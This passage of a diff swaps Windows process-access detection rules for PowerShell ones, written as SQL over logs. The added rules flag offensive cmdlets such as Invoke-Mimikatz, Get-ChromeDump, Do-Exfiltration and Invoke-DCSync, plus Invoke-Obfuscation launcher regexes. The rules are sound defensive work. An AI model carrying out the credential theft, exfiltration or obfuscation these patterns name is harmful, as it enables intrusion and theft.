Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR 
(TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - 
"title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single 
computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE 
'%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using 
a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND 
CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' 